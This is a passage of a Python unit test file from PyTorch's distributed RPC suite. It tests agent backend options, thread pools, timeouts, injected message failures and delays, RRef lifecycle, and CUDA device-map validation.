if get_name(event) in EXPECTED_REMOTE_EVENTS:
self.assertGreater(event.cuda_time_total, 0)
self.assertEqual(1, len(event.kernels))
kernel = event.kernels[0]
if event.node_id == dst_cuda_0:
self.assertEqual(kernel.device, 0)
if event.node_id == dst_cuda_1:
self.assertEqual(kernel.device, 1)
self.assertGreater(event.cuda_time, 0)
# Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
# events.
remote_events = [event for event in function_events if event.is_remote]
remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
class ProcessGroupAgentRpcTest(RpcAgentTestFixture):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# ProcessGroupRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `ProcessGroupRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.PROCESS_GROUP,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.init_method
)
with self.assertLogs("torch.distributed.rpc", logging.WARNING) as cm:
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIn(
"To silence this warning pass `backend=BackendType.PROCESS_GROUP` explicitly.",
"\n".join(cm.output),
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.ProcessGroupAgent)
def test_logs_deprecation_warning(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.PROCESS_GROUP,
rpc_backend_options=self.rpc_backend_options,
)
self.assertEqual(1, len(w))
self.assertIn(
"It is recommended to migrate to the TENSORPIPE backend.",
str(w[-1].message),
)
rpc.shutdown()
def test_single_threaded_rref_owner(self):
# We need a process group in order to perform a barrier at the end.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# This test aims to verify that the server can handle all internal RPC
# messages using just one thread.
caller_rank = 0
callee_rank = 1
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=1
) if self.rank == callee_rank else self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
if self.rank == caller_rank:
dst = worker_name(callee_rank)
rrefs = []
# make sure there are no existing OwnerRRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
self.assertEqual(0, int(info["num_owner_rrefs"]))
# creating RRefs on dst
for i in range(20):
rrefs.append(
rpc.remote(dst, delayed_add, args=(torch.zeros(2, 2), i))
)
# using RRefs on dst
futs = []
for i in range(len(rrefs)):
futs.append(
rpc.rpc_async(dst, my_rref_function, args=(rrefs[i], rrefs[i]))
)
# wait for results and check
for i in range(len(futs)):
self.assertEqual(2 * (torch.zeros(2, 2) + i), futs[i].wait())
# check we created the expected number of RRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
self.assertEqual(len(futs), num_owner_rrefs)
# trigger RRef deletion
del futs
del rrefs
# wait until OwnerRRefs are cleared on dst
while num_owner_rrefs > 0:
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
time.sleep(0.01)
# use a barrier to prevent messages sent during shutdown from occupying the
# only thread on the callee (rank == 1) too early.
dist.barrier()
rpc.shutdown()
def test_single_threaded_rref_to_here(self):
# We need a process group in order to perform a barrier at the end.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# This test aims to verify that the server can handle all internal RPC
# messages using just one thread.
caller_rank = 0
callee_rank = 1
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=1
) if self.rank == callee_rank else self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
if self.rank == caller_rank:
dst = worker_name(callee_rank)
rrefs = []
# make sure there are no existing OwnerRRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
self.assertEqual(0, int(info["num_owner_rrefs"]))
# creating RRefs on dst
for i in range(20):
rrefs.append(
rpc.remote(dst, delayed_add, args=(torch.zeros(2, 2), i))
)
# wait for results and check
for i in range(len(rrefs)):
self.assertEqual(torch.zeros(2, 2) + i, rrefs[i].to_here())
# check we created the expected number of RRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
self.assertEqual(len(rrefs), num_owner_rrefs)
# trigger RRef deletion
del rrefs
# wait until OwnerRRefs are cleared on dst
while num_owner_rrefs > 0:
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
time.sleep(0.01)
# use a barrier to prevent messages sent during shutdown from occupying the
# only thread on the callee (rank == 1) too early.
dist.barrier()
rpc.shutdown()
@dist_init
def test_process_group_debug_info(self):
rpc.enable_gil_profiling(True)
initialize_pg(self.file_init_method, self.rank, self.world_size)
NUM_THREAD = self.rpc_backend_options.num_send_recv_threads
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.num_pending_requests", info)
self.assertIn("agent.thread_pool_size", info)
self.assertIn("agent.num_idle_threads", info)
self.assertIn("agent.gil_average_wait_time_us", info)
self.assertEqual(int(info["agent.num_pending_requests"]), 0)
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREAD)
self.assertEqual(int(info["agent.num_idle_threads"]), NUM_THREAD)
# for the above check, add a barrier to ensure that another worker
# cannot send a request before we check num_idle_threads, since we'd
# use up an idle thread if we start processing that request.
dist.barrier()
dst_rank = (self.rank + 1) % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank), set_and_check_done, args=(dst_rank,)
)
# blocks until the request arrives
self.assertEqual(self.rank, VALUE_FUTURE.result())
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.num_pending_requests", info)
self.assertIn("agent.thread_pool_size", info)
self.assertIn("agent.num_idle_threads", info)
self.assertIn("agent.gil_average_wait_time_us", info)
self.assertGreaterEqual(float(info["agent.gil_average_wait_time_us"]), 0)
self.assertEqual(int(info["agent.num_pending_requests"]), 1)
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREAD)
num_idle_threads = int(info["agent.num_idle_threads"])
# as we cannot know for sure whether the send thread has returned, there
# might be either 1 or 2 busy threads
self.assertTrue(num_idle_threads in [NUM_THREAD - 1, NUM_THREAD - 2])
# add a barrier to make sure the request is not finished before checking
# num_pending_requests
dist.barrier()
DONE_FUTURE.set_result(self.rank)
self.assertEqual(dst_rank, fut.wait())
# add a barrier to make sure the dst_rank has finished processing the
# request
dist.barrier()
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.num_pending_requests", info)
self.assertIn("agent.thread_pool_size", info)
self.assertIn("agent.num_idle_threads", info)
self.assertEqual(int(info["agent.num_pending_requests"]), 0)
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREAD)
for retry in range(3):
# even if the future has completed, there is no guarantee that
# the local send/recv threads would have finished. We try three
# times. (NB: this might potentially be flaky. If flakiness does
# occur, then we have to relax the assert.)
info = rpc.api._get_current_rpc_agent().get_debug_info()
if int(info["agent.num_idle_threads"]) == NUM_THREAD:
break
time.sleep(0.1)
self.assertEqual(int(info["agent.num_idle_threads"]), NUM_THREAD)
# add a barrier to make sure SHUTDOWN message is not sent
dist.barrier()
@dist_init(setup_rpc=False)
def test_set_and_get_num_send_recv_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_process_group_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=self.rpc_backend_options.num_send_recv_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_process_group_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing ProcessGroupRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=self.rpc_backend_options.num_send_recv_threads,
rpc_timeout=timeout,
)
class ProcessGroupAgentCudaRpcTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(2)
@dist_init
def test_cuda(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(3, 3).cuda(0)
t2 = torch.rand(3, 3).cuda(1)
t3 = torch.rand(3, 3)
# cuda tensors as args fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, torch.add, args=(t1, t2))
# mix of cpu and cuda tensors as args fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, torch.add, args=(t1, t3))
# gpu tensor list as args fails.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, RpcTest._gpu_tensor_list_arg, args=([t1, t2],))
# cuda tensors as return values fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, RpcTest._return_gpu_tensor, args=())
# cuda tensors in a list of return values fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, RpcTest._return_gpu_tensor_list, args=())
# Sending to self should fail too.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(worker_name(self.rank), torch.add, args=(t1, t2))
class FaultyAgentRpcTest(RpcAgentTestFixture):
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init(messages_to_delay={})
def test_check_failed_messages(self):
if self.rank == 0:
dst_worker_b = worker_name((self.rank + 1) % self.world_size)
dst_worker_c = worker_name((self.rank + 2) % self.world_size)
# Worker0 sends RPC to Worker1 and creates an RRef there
rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
# Worker0 sends an RPC to Worker2 with the RRef as an arg
rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
# check if the output is as expected
self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
# explicitly delete all User RRefs
_delete_all_user_and_unforked_owner_rrefs()
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_PROCESS_GROUP)
self.assertEqual(self.rpc_backend_options.num_send_recv_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
self.assertEqual(
set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
set(self.rpc_backend_options.messages_to_fail),
)
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
if self.rank != 0:
return
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Attempting to fork the RRef should raise an error indicating the rpc.remote timeout.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref._serialize()
# Test that using RRef as arg over RPC (which forks) results in the same
# error
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# test the case where rpc.remote() message creation is completely dropped.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since the remote call message is failed synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, func, args=args)
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
# on the owning nodes; this is expected because the OwnerRRef was never
# successfully created. Therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# Test the case where remote message is eventually processed on the owner,
# but the future on the creator times out before the response comes back.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 1 ms timeout
rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# to_here() should now pick up that rpc.remote() creation has failed.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Test the case where rpc.remote() times out, but to_here() has already
# started blocking before.
# NOTE: we only test this when not sending to self, as to_here() calls
# localValue(), which does not send an RPC and thus does not have a timeout.
# This can be supported by allowing future.wait() to take in an optional
# timeout (https://github.com/pytorch/pytorch/issues/39280).
if dst_rank != self.rank:
slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
with self.assertRaisesRegex(RuntimeError, expected_error):
# to_here() should raise timeout error, since it does not know about the
# status of rpc.remote().
slow_rref.to_here(0.001)
# Note: If we proceed with shutdown, UserRRef will send out a RRefUserDelete
# but this can be a noop since it may not exist on the owner yet. Later,
# the owner can process the RRef creation and wait for the delete message,
# thus leading to a timeout.
# Therefore, we wait until we get notification that pending owners have
# been confirmed before sending out RRefUserDeletes.
if dst_rank != self.rank:
wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
func = my_sleep_func
args = (1,)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref.to_here(0.01)
rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
# PYTHON_CALL message types which correspond to Python UDF over RPC
# by default get a delay (see faulty_rpc_agent_test_fixture)
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(
dst_worker,
torch.add,
args=(torch.tensor(1), torch.tensor(1)),
timeout=1,
)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# TensorPipeRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.init_method
)
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
@dist_init
def _test_rref_get_type_timeout(self, blocking):
# Test where we try to get the type of an RRef from an owner, but RRef
# creation is slower than the timeout passed into _get_type.
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.5
expected_err = self.get_timeout_error_regex()
# Blocking: blocks on inline call
if blocking:
with self.assertRaisesRegex(RuntimeError, expected_err):
slow_rref._get_type(timeout=timeout, blocking=blocking)
# Non-blocking: blocks on wait
else:
fut = slow_rref._get_type(timeout=timeout, blocking=blocking)
with self.assertRaisesRegex(RuntimeError, expected_err):
fut.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
def test_rref_get_type_timeout_blocking(self):
self._test_rref_get_type_timeout(blocking=True)
def test_rref_get_type_timeout_non_blocking(self):
self._test_rref_get_type_timeout(blocking=False)
@dist_init
def test_op_with_invalid_args(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Overloaded torch operator invoked from Python failed to many any schema"
):
rpc.rpc_sync(dst, torch.add, args=())
def _test_rref_proxy_timeout(self, rref_proxy_api):
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), ))
# Ensure RRef is created on remote node.
rref.to_here()
rref_api = getattr(rref, rref_proxy_api)
self.assertTrue(rref_api is not None, f"Failed to get RRef proxy api: {rref_proxy_api}")
expected_error = self.get_timeout_error_regex()
timeout = 2
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_slow_method(torch.ones(2, 2))
if rref_api == rref.rpc_async:
result.wait()
elif rref_api == rref.remote:
result._get_future().wait()
# Case where rpc.remote() is stuck and exceeds timeout
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.01
rref_api = getattr(slow_rref, rref_proxy_api)
# Note that even when we call rref.rpc_async() in this case, we
# time out during future creation, not while waiting for the future. This is
# because the rref proxy function calls rref._get_type before returning the
# future, which blocks on the RRef being created on the owner node, up to the
# specified timeout.
with self.assertRaisesRegex(RuntimeError, expected_error):
rref_api(timeout=timeout).my_instance_method(torch.ones(2, 2))
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
@dist_init
def test_rref_proxy_timeout(self):
for rpc_api in ["rpc_sync", "rpc_async", "remote"]:
self._test_rref_proxy_timeout(rpc_api)
class MyConvNetForMNIST(nn.Module):
def __init__(self, device):
super().__init__()
self.net = nn.Sequential(
nn.Conv2d(1, 16, 3, 1),
nn.ReLU(),
nn.Conv2d(16, 32, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Flatten(1),
nn.Linear(4608, 128),
nn.ReLU(),
nn.Linear(128, 10),
).to(device)
self.device = device
def forward(self, x, is_rref=False):
x = x.to_here() if is_rref else x
with torch.cuda.stream(torch.cuda.current_stream(self.device)):
# intentionally adding delay to current CUDA stream
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
return self.net(x)
def __getstate__(self):
# return an empty dict to avoid inspecting the model contents on the
# owner
return {}
class TensorPipeAgentCudaRpcTest(RpcAgentTestFixture):
def _test_device_maps(self, options, errMsg):
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(
options,
errMsg="Node worker0 has invalid target node names in its device maps"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(
options,
errMsg="Node worker0 has source devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(
options,
errMsg="Node worker0 has target devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(
options,
errMsg="Node worker0 has duplicated target devices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
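# Asserts that the device map placed both arguments on cuda:1, then returns
# their sum on cuda:0.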
@staticmethod
def _gpu_add(x, y):
